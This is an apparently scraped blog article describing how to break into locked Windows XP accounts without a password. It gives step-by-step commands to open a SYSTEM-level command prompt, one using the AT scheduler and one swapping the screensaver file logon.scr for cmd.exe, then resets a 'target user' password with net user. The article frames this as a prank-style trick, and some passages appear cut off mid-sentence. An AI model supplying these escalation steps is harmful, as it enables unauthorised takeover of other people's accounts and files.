Professional Documents
Culture Documents
Categories: Impress Your Friends, Grey Hat, Passwords and Keys, Windows
Last month, I wrote about automatically cracking the Windows XP password with
Ophcrack. In the article, I revealed the simplicity of downloading the Live-on-CD *.iso
Linux distribution file and running it at the computer startup.
But sometimes, it is not even necessary to obtain access to a locked Windows machine by
that means. There are even easier ways to access an account in Windows XP. These
methods do not even require any downloads or storage media (like CDs or floppy disks)
to perform them. The only caveat is that these methods will never reveal the password.
They will only reset and change the password to any combination that pleases you.
Hidden Users
Microsoft Windows operating systems - all built on or based off of the NT kernel - host
several users other than the ones we see everyday like Mom, Dad, Sister, and
Brother. You rarely ever notice SYSTEM, NETWORK SERVICE, or LOCAL
SERVICE. But these unseen automated users work with us everyday to ensure that
everything runs smoothly. Since every program cannot be run with a user executing it,
the Windows kernel creates artificial users to run these processes.
Proof
Want proof? Press Ctrl + Alt + Del (or Start Menu, Run, and taskmgr.exe). Then
click the Processes tab. Make sure Show processes from all users is checked at the
bottom. If your current user is in the administrators group policy, you can see these
hidden entities.
requirements for this method. First, you will need any type of user access, be it Limited
User or Guest. Second, either the scheduling system has to be enabled or the screen saver
has to be configured. Lastly, Windows cannot be patched. Im pretty sure Microsoft
would have plugged the hole since this discovery was a breakthrough in the tech world
last year.
AT Command
The AT command schedules the operating system to run programs automatically. For
example, if you want the operating system to make a backup of a crucial file or if you
want the operating system to update the dynamic DNS provider with the current IP
address, AT is at your command. It is the windows equivalent to the *nix cron
command. The loophole is who runs the program when it is time to execute it. The
SYSTEM user runs the command instead of the original user. So, if you schedule the
OS to run cmd in the next minute, youll get the console DOS prompt for the
SYSTEM user.
1. Go to Start Menu then Run
2. Type in cmd.exe
3. In the command prompt type at 4:25pm /interactive cmd.exe replacing the time
with the next minute.
4. When the new command prompt appears, type net user username password
replacing username with your target user and password with the password
combination that you want to set.
When it is time for Windows to display the screen saver, the SYSTEM runs the
screensaver file (which is pretty much an *.exe file renamed *.src). If you replace the
default screensaver file with the cmd.exe file, again, you will obtain access to the
SYSTEM console.
1. Go to Start Menu then Run
2. Type in cmd.exe
3. Type cd\
4. Type cd\windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
The next time the screen saver is supposed to run, the command prompt will display.
Then you can type net user username password replacing username with your target
user and password with the password combination that you want to set.
Plan C (or the Nth Plan)
If you still are unable to crack the password. Its time to bust out a CD and burn
Ophcrack. Read my previous article on the specifics. But if your file system is an EFS
(encrypted file system), youre pretty much out of luck. The file system is encrypted with
the Windows password. If you reset the password, you loose access to the files. Sorry,
but thats the way the cookie crumbles!